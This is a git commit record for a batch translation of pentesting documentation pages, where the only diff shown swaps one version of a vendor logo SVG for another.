Translated ['network-services-pentesting/512-pentesting-rexec.md', 'netw

This commit is contained in:
Translator 2024-08-04 15:19:55 +00:00
parent 13a820f7ce
commit 3bffca745e
17 changed files with 333 additions and 320 deletions

View file

@ -1,29 +1,42 @@
<svg width="796" height="313" viewBox="0 0 796 313" fill="none" xmlns="http://www.w3.org/2000/svg">
<rect width="796" height="313" rx="20" fill="#262626"/>
<g clip-path="url(#clip0_2558_1885)">
<path d="M559.476 215.161C556.326 215.161 553.887 214.188 552.162 212.232C550.436 210.285 549.583 207.475 549.583 203.803C549.583 200.191 550.446 197.381 552.162 195.375C553.887 193.368 556.295 192.365 559.386 192.365C563.971 192.365 566.761 194.371 567.734 198.385L584.34 196.84C583.658 193.227 582.203 190.127 579.995 187.548C577.788 184.97 574.938 183.033 571.436 181.739C567.935 180.444 563.861 179.802 559.215 179.802C558.714 179.802 558.232 179.832 557.74 179.852C549.583 188.813 541.144 197.502 532.425 205.92C532.666 210.074 533.739 213.716 535.636 216.847C537.813 220.429 540.894 223.138 544.887 224.974C548.87 226.811 553.596 227.724 559.045 227.724C566.62 227.724 572.641 226.108 577.116 222.857C581.591 219.616 584.26 214.961 585.113 208.88H568.336C567.644 213.064 564.694 215.161 559.476 215.161Z" fill="#FA8072"/>
<path d="M526.375 211.65C521.879 215.854 517.324 219.988 512.688 224.051C514.384 226.279 517.053 227.724 520.063 227.724C525.191 227.724 529.345 223.57 529.345 218.442C529.345 215.753 528.201 213.345 526.375 211.65Z" fill="#FA8072"/>
<path d="M728.937 184.317C725.977 181.307 721.843 179.802 716.505 179.802C709.11 179.802 703.14 182.501 698.605 187.889C697.28 185.251 695.364 183.244 692.835 181.869C690.307 180.495 687.277 179.802 683.715 179.802C677.233 179.802 671.754 182.351 667.279 187.458V181.177H650.583V226.349H667.62V201.746C667.62 199.448 668.483 197.442 670.199 195.726C671.112 194.753 672.166 194 673.34 193.488C674.514 192.977 675.738 192.716 677.002 192.716C679.3 192.716 680.945 193.288 681.949 194.442C682.952 195.585 683.454 197.422 683.454 199.95V226.369H700.491V201.244C700.491 199.178 701.354 197.291 703.07 195.565C705.077 193.669 707.344 192.726 709.873 192.726C712.171 192.726 713.816 193.318 714.819 194.492C715.823 195.666 716.325 197.492 716.325 199.96V226.379H733.362V196.95C733.362 191.562 731.887 187.358 728.937 184.348V184.317Z" fill="#FA8072"/>
<path d="M637.088 186.033C632.271 181.879 625.469 179.792 616.699 179.792C607.919 179.792 601.006 181.939 595.959 186.244C590.912 190.548 588.384 196.458 588.384 203.964C588.384 211.479 590.792 217.319 595.608 221.473C600.424 225.637 607.227 227.714 615.997 227.714C624.776 227.714 631.679 225.566 636.736 221.262C641.783 216.957 644.312 211.078 644.312 203.623C644.312 196.047 641.904 190.187 637.088 186.023V186.033ZM624.315 212.232C622.448 214.178 619.799 215.161 616.358 215.161C612.856 215.161 610.187 214.188 608.361 212.232C606.525 210.285 605.612 207.475 605.612 203.803C605.612 200.131 606.545 197.231 608.411 195.284C610.277 193.338 612.926 192.365 616.368 192.365C619.809 192.365 622.529 193.338 624.365 195.284C626.201 197.231 627.114 200.05 627.114 203.713C627.114 207.445 626.181 210.285 624.315 212.232Z" fill="#FA8072"/>
<path d="M489.069 194.973C488.557 193.368 487.554 192.194 486.059 191.452C484.564 190.709 482.507 190.338 479.868 190.338C477.289 190.338 475.282 190.639 473.848 191.241C472.413 191.843 471.7 192.716 471.7 193.86C471.7 194.893 472.262 195.696 473.376 196.268C474.5 196.84 476.396 197.301 479.095 197.642L485.286 198.505C490.674 199.248 494.818 200.201 497.718 201.345C500.608 202.489 502.665 203.964 503.869 205.77C505.073 207.576 505.675 209.944 505.675 212.864C505.675 217.74 503.578 221.433 499.394 223.961C495.21 226.48 489.079 227.744 480.992 227.744C472.904 227.744 466.172 226.429 461.817 223.79C457.462 221.152 454.994 217.198 454.422 211.92H470.336C471.369 215.242 474.831 216.907 480.741 216.907C483.49 216.907 485.587 216.606 487.022 216.004C488.457 215.402 489.169 214.499 489.169 213.295C489.169 212.262 488.627 211.489 487.534 210.977C486.44 210.466 484.524 210.034 481.774 209.683L476.095 208.91C471.048 208.218 467.055 207.265 464.095 206.031C461.145 204.796 459.008 203.221 457.683 201.305C456.359 199.388 455.706 196.99 455.706 194.121C455.706 189.595 457.824 186.083 462.068 183.585C466.312 181.087 472.242 179.842 479.868 179.842C487.263 179.842 492.972 180.936 496.986 183.113C500.999 185.291 503.578 188.762 504.722 193.518L489.069 194.983V194.973Z" fill="white"/>
<path d="M278.379 226.359V179.752H255.502V164.962H319.307V179.752H296.43V226.359H278.369H278.379Z" fill="white"/>
<path d="M365.673 203.663C365.673 211.118 363.145 216.988 358.108 221.292C353.061 225.597 346.157 227.744 337.378 227.744C328.608 227.744 321.815 225.667 316.999 221.513C312.183 217.359 309.775 211.519 309.775 204.014C309.775 196.509 312.293 190.599 317.34 186.294C322.387 181.99 329.291 179.842 338.07 179.842C346.84 179.842 353.633 181.919 358.449 186.073C363.265 190.227 365.673 196.097 365.673 203.663ZM348.475 203.753C348.475 200.081 347.552 197.271 345.726 195.325C343.89 193.378 341.221 192.405 337.729 192.405C334.237 192.405 331.638 193.378 329.772 195.325C327.906 197.271 326.973 200.111 326.973 203.843C326.973 207.516 327.886 210.325 329.722 212.272C331.558 214.218 334.217 215.191 337.719 215.191C341.161 215.191 343.809 214.218 345.676 212.272C347.542 210.325 348.475 207.486 348.475 203.753Z" fill="white"/>
<path d="M425.695 203.663C425.695 211.118 423.167 216.988 418.13 221.292C413.083 225.597 406.18 227.744 397.4 227.744C388.631 227.744 381.838 225.667 377.021 221.513C372.205 217.359 369.797 211.519 369.797 204.014C369.797 196.509 372.316 190.599 377.363 186.294C382.41 181.99 389.313 179.842 398.092 179.842C406.862 179.842 413.655 181.919 418.471 186.073C423.287 190.227 425.695 196.097 425.695 203.663ZM408.497 203.753C408.497 200.081 407.574 197.271 405.748 195.325C403.912 193.378 401.243 192.405 397.751 192.405C394.31 192.405 391.661 193.378 389.794 195.325C387.928 197.271 386.995 200.111 386.995 203.843C386.995 207.576 387.908 210.325 389.744 212.272C391.581 214.218 394.239 215.191 397.741 215.191C401.243 215.191 403.832 214.218 405.698 212.272C407.564 210.325 408.497 207.486 408.497 203.753Z" fill="white"/>
<path d="M431.967 226.359V164.962H448.994V226.359H431.967Z" fill="white"/>
<path d="M255.502 147.935V86.5381H285.945C295.115 86.5381 301.979 88.284 306.544 91.7858C311.099 95.2876 313.377 100.585 313.377 107.699C313.377 114.864 311.039 120.201 306.363 123.693C301.688 127.195 294.543 128.941 284.911 128.941H273.041V147.945H255.502V147.935ZM284.57 115.425C288.473 115.425 291.293 114.813 293.038 113.579C294.784 112.345 295.667 110.358 295.667 107.599C295.667 104.96 294.804 103.044 293.089 101.84C291.373 100.636 288.583 100.034 284.75 100.034H273.051V115.425H284.57Z" fill="white"/>
<path d="M331.528 129.362C331.819 132.172 332.923 134.309 334.839 135.774C336.756 137.239 339.415 137.971 342.796 137.971C348.244 137.971 351.566 136.456 352.77 133.416H368.513C366.165 144.022 357.445 149.33 342.375 149.33C333.826 149.33 327.214 147.293 322.508 143.219C317.802 139.145 315.454 133.386 315.454 125.931C315.454 121.175 316.538 116.941 318.725 113.248C320.902 109.546 324.053 106.656 328.187 104.559C332.311 102.472 337.187 101.418 342.806 101.418C351.114 101.418 357.566 103.465 362.151 107.569C366.737 111.673 369.034 117.472 369.034 124.988V129.372H331.538L331.528 129.362ZM353.201 120.332C352.91 115.175 349.358 112.596 342.535 112.596C339.726 112.596 337.338 113.308 335.351 114.743C333.374 116.178 332.21 118.044 331.869 120.332H353.191H353.201Z" fill="white"/>
<path d="M410.725 147.935V121.877C410.725 119.238 410.113 117.322 408.879 116.118C407.645 114.914 405.708 114.312 403.069 114.312C401.634 114.312 400.23 114.583 398.855 115.124C397.48 115.666 396.276 116.429 395.243 117.402C393.296 119.178 392.323 121.245 392.323 123.593V147.925H375.296V102.783H391.982V109.064C396.738 103.967 402.648 101.408 409.702 101.408C415.381 101.408 419.806 102.913 422.986 105.923C426.167 108.934 427.762 113.158 427.762 118.606V147.935H410.735H410.725Z" fill="white"/>
<path d="M471.359 146.641C467.005 148.075 462.329 148.788 457.342 148.788C450.92 148.788 446.265 147.443 443.365 144.744C440.465 142.055 439.02 137.66 439.02 131.59V115.165H430.421V102.783H439.02V90.9128H456.048V102.783H469.463V115.165H456.048V130.386C456.048 132.393 456.549 133.868 457.553 134.811C458.556 135.754 460.172 136.226 462.409 136.226C464.296 136.226 466.593 135.824 469.292 135.021L471.359 146.631V146.641Z" fill="white"/>
<path d="M488.898 129.362C489.179 132.172 490.283 134.309 492.209 135.774C494.126 137.239 496.785 137.971 500.166 137.971C505.614 137.971 508.936 136.456 510.14 133.416H525.873C523.525 144.022 514.805 149.33 499.735 149.33C491.196 149.33 484.574 147.293 479.868 143.219C475.162 139.145 472.814 133.386 472.814 125.931C472.814 121.175 473.898 116.941 476.085 113.248C478.262 109.546 481.413 106.656 485.547 104.559C489.681 102.472 494.547 101.418 500.166 101.418C508.474 101.418 514.926 103.465 519.511 107.569C524.097 111.673 526.394 117.472 526.394 124.988V129.372H488.898V129.362ZM510.571 120.332C510.28 115.175 506.728 112.596 499.905 112.596C497.096 112.596 494.698 113.308 492.721 114.743C490.744 116.178 489.58 118.044 489.239 120.332H510.561H510.571Z" fill="white"/>
<path d="M564.323 116.549C563.811 114.944 562.807 113.77 561.312 113.027C559.817 112.285 557.76 111.914 555.121 111.914C552.483 111.914 550.536 112.215 549.101 112.817C547.666 113.419 546.954 114.292 546.954 115.435C546.954 116.469 547.516 117.272 548.63 117.844C549.753 118.415 551.65 118.877 554.349 119.218L560.54 120.081C565.928 120.824 570.072 121.777 572.972 122.921C575.861 124.065 577.918 125.539 579.122 127.346C580.326 129.152 580.928 131.52 580.928 134.439C580.928 139.316 578.831 143.008 574.647 145.537C570.463 148.055 564.333 149.32 556.245 149.32C547.817 149.32 541.425 148.005 537.071 145.366C532.716 142.727 530.248 138.774 529.676 133.496H545.589C546.623 136.817 550.085 138.483 555.994 138.483C558.744 138.483 560.841 138.182 562.276 137.58C563.71 136.978 564.423 136.075 564.423 134.871C564.423 133.837 563.881 133.065 562.787 132.553C561.694 132.041 559.777 131.61 557.028 131.259L551.349 130.486C546.302 129.794 542.308 128.841 539.348 127.606C536.398 126.372 534.261 124.797 532.937 122.881C531.612 120.964 530.96 118.566 530.96 115.696C530.96 111.171 533.077 107.659 537.322 105.161C541.566 102.662 547.496 101.418 555.121 101.418C562.747 101.418 568.226 102.512 572.239 104.689C576.253 106.867 578.831 110.338 579.975 115.094L564.323 116.559V116.549Z" fill="white"/>
<path d="M622.88 146.641C618.525 148.075 613.849 148.788 608.863 148.788C602.441 148.788 597.785 147.443 594.886 144.744C591.986 142.055 590.541 137.66 590.541 131.59V115.165H581.942V102.783H590.541V90.9128H607.568V102.783H620.983V115.165H607.568V130.386C607.568 132.393 608.07 133.868 609.073 134.811C610.077 135.754 611.702 136.226 613.93 136.226C615.826 136.226 618.114 135.824 620.813 135.021L622.88 146.631V146.641Z" fill="white"/>
<path d="M137.264 77.4073L209.748 95.739C210.3 94.9664 210.852 94.2039 211.403 93.4313V93.4112C213.641 90.2405 215.848 87.0297 218.026 83.8088C218.357 83.3172 218.678 82.8255 219.009 82.3339C220.775 79.705 222.511 77.0561 224.237 74.3971C224.778 73.5643 225.32 72.7215 225.852 71.8786C227.397 69.4605 228.922 67.0223 230.437 64.574C230.969 63.7111 231.511 62.8482 232.043 61.9853C234.01 58.7645 235.956 55.5135 237.873 52.2525L238.264 51.51H235.675C226.414 60.8916 215.668 71.2967 205.674 79.9157L137.264 62.6174L62 81.6315L63.3646 96.0902L137.264 77.4073Z" fill="#FA8072"/>
<path d="M92.8138 216.255C133.983 185.01 170.546 148.236 201.661 106.776L137.264 90.5015L64.7393 108.833L69.405 158.069C71.4418 179.582 79.7097 199.729 92.8239 216.255H92.8138Z" fill="#2A76D1"/>
<path d="M77.2213 247.561C76.9303 247.781 76.6293 248.012 76.3383 248.233C73.5489 250.37 70.7294 252.477 67.8999 254.564V256.3C71.0907 255.046 74.2714 253.772 77.432 252.457L90.9275 246.597C98.3926 243.216 105.767 239.664 113.032 235.931C115.28 237.617 117.587 239.233 119.975 240.748L137.274 251.765L154.572 240.748C183.269 222.456 201.931 191.953 205.142 158.079L209.808 108.843L206.166 107.92C171.389 161.601 127.912 208.7 77.2213 247.561Z" fill="white"/>
</g>
<?xml version="1.0" encoding="UTF-8"?>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="550px" height="216px" viewBox="0 0 549 216" version="1.1">
<defs>
<clipPath id="clip0_2558_1885">
<rect width="671.362" height="204.8" fill="white" transform="translate(62 51.5)"/>
<clipPath id="clip1">
<path d="M 448 124 L 505.796875 124 L 505.796875 157 L 448 157 Z M 448 124 "/>
</clipPath>
<clipPath id="clip2">
<path d="M 42.761719 35.539062 L 165 35.539062 L 165 67 L 42.761719 67 Z M 42.761719 35.539062 "/>
</clipPath>
<clipPath id="clip3">
<path d="M 46 74 L 145 74 L 145 176.871094 L 46 176.871094 Z M 46 74 "/>
</clipPath>
</defs>
<g id="surface1">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(14.901961%,14.901961%,14.901961%);fill-opacity:1;" d="M 13.792969 0 L 535.207031 0 C 542.824219 0 549 6.179688 549 13.800781 L 549 202.199219 C 549 209.820312 542.824219 216 535.207031 216 L 13.792969 216 C 6.175781 216 0 209.820312 0 202.199219 L 0 13.800781 C 0 6.179688 6.175781 0 13.792969 0 Z M 13.792969 0 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 385.871094 148.480469 C 383.695312 148.480469 382.015625 147.808594 380.824219 146.460938 C 379.636719 145.117188 379.046875 143.175781 379.046875 140.644531 C 379.046875 138.152344 379.640625 136.210938 380.824219 134.828125 C 382.015625 133.441406 383.675781 132.75 385.808594 132.75 C 388.96875 132.75 390.894531 134.132812 391.566406 136.90625 L 403.019531 135.839844 C 402.546875 133.34375 401.542969 131.207031 400.023438 129.425781 C 398.5 127.648438 396.535156 126.308594 394.117188 125.417969 C 391.703125 124.523438 388.894531 124.082031 385.691406 124.082031 C 385.34375 124.082031 385.011719 124.101562 384.671875 124.113281 C 379.046875 130.300781 373.226562 136.296875 367.210938 142.105469 C 367.378906 144.972656 368.117188 147.484375 369.425781 149.644531 C 370.929688 152.117188 373.054688 153.988281 375.808594 155.253906 C 378.554688 156.519531 381.8125 157.152344 385.574219 157.152344 C 390.796875 157.152344 394.949219 156.035156 398.035156 153.792969 C 401.121094 151.554688 402.964844 148.34375 403.550781 144.148438 L 391.980469 144.148438 C 391.503906 147.035156 389.46875 148.480469 385.871094 148.480469 Z M 385.871094 148.480469 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 363.039062 146.058594 C 359.9375 148.960938 356.796875 151.8125 353.601562 154.617188 C 354.769531 156.152344 356.609375 157.152344 358.6875 157.152344 C 362.222656 157.152344 365.089844 154.285156 365.089844 150.746094 C 365.089844 148.890625 364.300781 147.226562 363.039062 146.058594 Z M 363.039062 146.058594 "/>
<g clip-path="url(#clip1)" clip-rule="nonzero">
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 502.746094 127.195312 C 500.707031 125.121094 497.855469 124.082031 494.171875 124.082031 C 489.070312 124.082031 484.953125 125.941406 481.828125 129.660156 C 480.914062 127.839844 479.589844 126.457031 477.847656 125.507812 C 476.105469 124.558594 474.015625 124.082031 471.558594 124.082031 C 467.085938 124.082031 463.308594 125.839844 460.222656 129.363281 L 460.222656 125.03125 L 448.707031 125.03125 L 448.707031 156.203125 L 460.457031 156.203125 L 460.457031 139.222656 C 460.457031 137.636719 461.050781 136.253906 462.234375 135.070312 C 462.863281 134.398438 463.59375 133.878906 464.402344 133.523438 C 465.210938 133.171875 466.054688 132.992188 466.925781 132.992188 C 468.511719 132.992188 469.648438 133.386719 470.339844 134.183594 C 471.03125 134.972656 471.378906 136.238281 471.378906 137.984375 L 471.378906 156.214844 L 483.128906 156.214844 L 483.128906 138.878906 C 483.128906 137.453125 483.722656 136.148438 484.90625 134.957031 C 486.289062 133.648438 487.855469 133 489.597656 133 C 491.183594 133 492.316406 133.40625 493.007812 134.21875 C 493.703125 135.027344 494.046875 136.289062 494.046875 137.992188 L 494.046875 156.222656 L 505.796875 156.222656 L 505.796875 135.914062 C 505.796875 132.195312 504.78125 129.296875 502.746094 127.21875 Z M 502.746094 127.195312 "/>
</g>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(98.039216%,50.196078%,44.705882%);fill-opacity:1;" d="M 439.398438 128.378906 C 436.078125 125.515625 431.386719 124.074219 425.335938 124.074219 C 419.28125 124.074219 414.511719 125.554688 411.03125 128.527344 C 407.550781 131.496094 405.808594 135.574219 405.808594 140.753906 C 405.808594 145.941406 407.46875 149.972656 410.789062 152.835938 C 414.113281 155.710938 418.804688 157.144531 424.851562 157.144531 C 430.90625 157.144531 435.667969 155.664062 439.15625 152.691406 C 442.636719 149.722656 444.382812 145.664062 444.382812 140.519531 C 444.382812 135.292969 442.71875 131.246094 439.398438 128.375 Z M 430.589844 146.460938 C 429.300781 147.804688 427.472656 148.480469 425.101562 148.480469 C 422.6875 148.480469 420.84375 147.808594 419.585938 146.460938 C 418.320312 145.117188 417.691406 143.175781 417.691406 140.644531 C 417.691406 138.109375 418.332031 136.109375 419.621094 134.765625 C 420.90625 133.421875 422.734375 132.75 425.109375 132.75 C 427.480469 132.75 429.355469 133.421875 430.625 134.765625 C 431.890625 136.109375 432.519531 138.054688 432.519531 140.582031 C 432.519531 143.15625 431.875 145.117188 430.589844 146.460938 Z M 430.589844 146.460938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.308594 134.550781 C 336.957031 133.441406 336.265625 132.632812 335.234375 132.121094 C 334.203125 131.609375 332.785156 131.351562 330.964844 131.351562 C 329.183594 131.351562 327.800781 131.558594 326.8125 131.976562 C 325.824219 132.390625 325.332031 132.992188 325.332031 133.78125 C 325.332031 134.496094 325.71875 135.050781 326.488281 135.445312 C 327.261719 135.839844 328.570312 136.15625 330.429688 136.390625 L 334.699219 136.988281 C 338.417969 137.5 341.273438 138.15625 343.273438 138.949219 C 345.269531 139.738281 346.6875 140.753906 347.519531 142 C 348.347656 143.246094 348.761719 144.882812 348.761719 146.898438 C 348.761719 150.261719 347.316406 152.808594 344.429688 154.554688 C 341.546875 156.292969 337.316406 157.164062 331.738281 157.164062 C 326.160156 157.164062 321.519531 156.257812 318.515625 154.4375 C 315.511719 152.617188 313.808594 149.886719 313.414062 146.246094 L 324.390625 146.246094 C 325.101562 148.539062 327.488281 149.6875 331.566406 149.6875 C 333.460938 149.6875 334.910156 149.480469 335.898438 149.0625 C 336.886719 148.648438 337.378906 148.023438 337.378906 147.195312 C 337.378906 146.480469 337.003906 145.949219 336.25 145.59375 C 335.496094 145.242188 334.175781 144.945312 332.277344 144.703125 L 328.363281 144.167969 C 324.882812 143.691406 322.128906 143.03125 320.085938 142.179688 C 318.050781 141.328125 316.578125 140.242188 315.664062 138.917969 C 314.75 137.597656 314.300781 135.941406 314.300781 133.960938 C 314.300781 130.839844 315.761719 128.414062 318.6875 126.691406 C 321.613281 124.96875 325.703125 124.109375 330.964844 124.109375 C 336.066406 124.109375 340.003906 124.863281 342.769531 126.367188 C 345.539062 127.867188 347.316406 130.265625 348.105469 133.546875 L 337.308594 134.558594 Z M 337.308594 134.550781 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 191.996094 156.210938 L 191.996094 124.046875 L 176.21875 124.046875 L 176.21875 113.839844 L 220.226562 113.839844 L 220.226562 124.046875 L 204.449219 124.046875 L 204.449219 156.210938 L 191.992188 156.210938 Z M 191.996094 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 252.203125 140.546875 C 252.203125 145.691406 250.460938 149.742188 246.988281 152.710938 C 243.503906 155.683594 238.742188 157.164062 232.6875 157.164062 C 226.640625 157.164062 221.957031 155.730469 218.632812 152.863281 C 215.3125 150 213.652344 145.96875 213.652344 140.789062 C 213.652344 135.609375 215.386719 131.53125 218.867188 128.5625 C 222.351562 125.589844 227.113281 124.109375 233.167969 124.109375 C 239.214844 124.109375 243.898438 125.542969 247.222656 128.410156 C 250.542969 131.273438 252.203125 135.324219 252.203125 140.546875 Z M 240.34375 140.609375 C 240.34375 138.074219 239.707031 136.136719 238.445312 134.792969 C 237.179688 133.449219 235.339844 132.777344 232.929688 132.777344 C 230.523438 132.777344 228.730469 133.449219 227.441406 134.792969 C 226.15625 136.136719 225.511719 138.097656 225.511719 140.671875 C 225.511719 143.207031 226.140625 145.144531 227.410156 146.488281 C 228.675781 147.832031 230.507812 148.503906 232.925781 148.503906 C 235.296875 148.503906 237.125 147.832031 238.414062 146.488281 C 239.699219 145.144531 240.34375 143.183594 240.34375 140.609375 Z M 240.34375 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 293.601562 140.546875 C 293.601562 145.691406 291.859375 149.742188 288.382812 152.710938 C 284.902344 155.683594 280.140625 157.164062 274.085938 157.164062 C 268.039062 157.164062 263.351562 155.730469 260.03125 152.863281 C 256.710938 150 255.046875 145.96875 255.046875 140.789062 C 255.046875 135.609375 256.785156 131.53125 260.265625 128.5625 C 263.746094 125.589844 268.507812 124.109375 274.5625 124.109375 C 280.613281 124.109375 285.296875 125.542969 288.617188 128.410156 C 291.941406 131.273438 293.601562 135.324219 293.601562 140.546875 Z M 281.738281 140.609375 C 281.738281 138.074219 281.101562 136.136719 279.84375 134.792969 C 278.578125 133.449219 276.738281 132.777344 274.328125 132.777344 C 271.953125 132.777344 270.128906 133.449219 268.839844 134.792969 C 267.554688 136.136719 266.910156 138.097656 266.910156 140.671875 C 266.910156 143.246094 267.539062 145.144531 268.804688 146.488281 C 270.074219 147.832031 271.90625 148.503906 274.320312 148.503906 C 276.738281 148.503906 278.523438 147.832031 279.808594 146.488281 C 281.097656 145.144531 281.738281 143.183594 281.738281 140.609375 Z M 281.738281 140.609375 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 297.925781 156.210938 L 297.925781 113.839844 L 309.671875 113.839844 L 309.671875 156.210938 Z M 297.925781 156.210938 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 176.21875 102.089844 L 176.21875 59.71875 L 197.214844 59.71875 C 203.539062 59.71875 208.273438 60.925781 211.421875 63.339844 C 214.566406 65.757812 216.136719 69.414062 216.136719 74.324219 C 216.136719 79.265625 214.523438 82.949219 211.296875 85.359375 C 208.074219 87.777344 203.144531 88.980469 196.503906 88.980469 L 188.316406 88.980469 L 188.316406 102.097656 L 176.21875 102.097656 Z M 196.265625 79.65625 C 198.960938 79.65625 200.90625 79.230469 202.109375 78.378906 C 203.3125 77.527344 203.921875 76.15625 203.921875 74.253906 C 203.921875 72.433594 203.324219 71.109375 202.144531 70.28125 C 200.960938 69.449219 199.035156 69.03125 196.390625 69.03125 L 188.324219 69.03125 L 188.324219 79.65625 Z M 196.265625 79.65625 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 228.65625 89.273438 C 228.855469 91.210938 229.617188 92.6875 230.9375 93.695312 C 232.261719 94.707031 234.09375 95.214844 236.425781 95.214844 C 240.183594 95.214844 242.472656 94.167969 243.304688 92.070312 L 254.164062 92.070312 C 252.542969 99.390625 246.527344 103.050781 236.136719 103.050781 C 230.238281 103.050781 225.679688 101.644531 222.433594 98.835938 C 219.1875 96.023438 217.566406 92.050781 217.566406 86.90625 C 217.566406 83.621094 218.316406 80.699219 219.824219 78.152344 C 221.324219 75.597656 223.5 73.601562 226.351562 72.15625 C 229.195312 70.714844 232.558594 69.988281 236.433594 69.988281 C 242.164062 69.988281 246.613281 71.402344 249.773438 74.234375 C 252.9375 77.066406 254.523438 81.066406 254.523438 86.253906 L 254.523438 89.277344 L 228.660156 89.277344 Z M 243.601562 83.039062 C 243.402344 79.480469 240.953125 77.703125 236.246094 77.703125 C 234.308594 77.703125 232.660156 78.195312 231.292969 79.183594 C 229.925781 80.175781 229.125 81.460938 228.890625 83.039062 Z M 243.601562 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 283.277344 102.089844 L 283.277344 84.105469 C 283.277344 82.285156 282.855469 80.964844 282.003906 80.132812 C 281.152344 79.300781 279.816406 78.886719 277.996094 78.886719 C 277.007812 78.886719 276.039062 79.074219 275.089844 79.445312 C 274.140625 79.820312 273.3125 80.347656 272.597656 81.019531 C 271.253906 82.246094 270.585938 83.671875 270.585938 85.292969 L 270.585938 102.082031 L 258.839844 102.082031 L 258.839844 70.929688 L 270.347656 70.929688 L 270.347656 75.265625 C 273.628906 71.746094 277.707031 69.980469 282.570312 69.980469 C 286.488281 69.980469 289.539062 71.019531 291.734375 73.097656 C 293.925781 75.175781 295.027344 78.089844 295.027344 81.847656 L 295.027344 102.089844 Z M 283.277344 102.089844 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 325.09375 101.195312 C 322.09375 102.1875 318.867188 102.679688 315.429688 102.679688 C 311 102.679688 307.789062 101.75 305.789062 99.886719 C 303.789062 98.03125 302.792969 95 302.792969 90.808594 L 302.792969 79.476562 L 296.859375 79.476562 L 296.859375 70.929688 L 302.792969 70.929688 L 302.792969 62.738281 L 314.535156 62.738281 L 314.535156 70.929688 L 323.789062 70.929688 L 323.789062 79.476562 L 314.535156 79.476562 L 314.535156 89.980469 C 314.535156 91.363281 314.882812 92.382812 315.574219 93.03125 C 316.265625 93.683594 317.378906 94.007812 318.921875 94.007812 C 320.222656 94.007812 321.808594 93.730469 323.671875 93.175781 L 325.09375 101.1875 Z M 325.09375 101.195312 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 337.191406 89.273438 C 337.386719 91.210938 338.148438 92.6875 339.476562 93.695312 C 340.796875 94.707031 342.632812 95.214844 344.964844 95.214844 C 348.722656 95.214844 351.011719 94.167969 351.84375 92.070312 L 362.695312 92.070312 C 361.074219 99.390625 355.058594 103.050781 344.667969 103.050781 C 338.777344 103.050781 334.210938 101.644531 330.964844 98.835938 C 327.71875 96.023438 326.097656 92.050781 326.097656 86.90625 C 326.097656 83.621094 326.847656 80.699219 328.355469 78.152344 C 329.855469 75.597656 332.03125 73.601562 334.882812 72.15625 C 337.730469 70.714844 341.089844 69.988281 344.964844 69.988281 C 350.695312 69.988281 355.144531 71.402344 358.304688 74.234375 C 361.46875 77.066406 363.054688 81.066406 363.054688 86.253906 L 363.054688 89.277344 L 337.191406 89.277344 Z M 352.140625 83.039062 C 351.9375 79.480469 349.488281 77.703125 344.785156 77.703125 C 342.847656 77.703125 341.191406 78.195312 339.828125 79.183594 C 338.464844 80.175781 337.664062 81.460938 337.425781 83.039062 Z M 352.140625 83.039062 "/>
<path style=" stroke:none;fill-rule:nonzero;fill:rgb(100%,100%,100%);fill-opacity:1;" d="M 389.210938 80.429688 C 388.859375 79.324219 388.167969 78.511719 387.136719 78 C 386.105469 77.488281 384.6875 77.230469 382.867188 77.230469 C 381.046875 77.230469 379.703125 77.4375 378.714844 77.855469 C 377.722656 78.269531 377.234375 78.871094 377.234375 79.660156 C 377.234375 80.375 377.621094 80.929688 378.390625 81.324219 C 379.164062 81.71875 380.472656 82.035156 382.332031 82.273438 L 386.605469 82.867188 C 390.320312 83.378906 393.179688 84.039062 395.179688 84.828125 C 397.171875 85.617188 398.589844 86.632812 399.417969 87.882812 C 400.25 89.128906 400.664062 90.761719 400.664062 92.777344 C 400.664062 96.140625 399.21875 98.6875 396.332031 100.433594 C 393.449219 102.171875 389.21875 103.046875 383.640625 103.046875 C 377.828125 103.046875 373.421875 102.136719 370.417969 100.316406 C 367.414062 98.496094 365.710938 95.765625 365.316406 92.125 L 376.292969 92.125 C 377.003906 94.417969 379.394531 95.566406 383.46875 95.566406 C 385.363281 95.566406 386.8125 95.359375 387.800781 94.945312 C 388.789062 94.527344 389.28125 93.90625 389.28125 93.074219 C 389.28125 92.359375 388.90625 91.828125 388.152344 91.472656 C 387.398438 91.121094 386.078125 90.824219 384.179688 90.582031 L 380.265625 90.046875 C 376.785156 89.570312 374.027344 88.914062 371.988281 88.058594 C 369.953125 87.207031 368.480469 86.121094 367.566406 84.800781 C 366.652344 83.476562 366.203125 81.820312 366.203125 79.839844 C 366.203125 76.71875 367.664062 74.296875 370.589844 72.570312 C 373.515625 70.847656 377.605469 69.988281 382.867188 69.988281 C 388.125 69.988281 391.90625 70.742188 394.671875 72.246094 C 397.441406 73.75 399.21875 76.144531 400.007812 79.425781 L 389.210938 80.4375 Z M 389.210938 80.429688 "/>
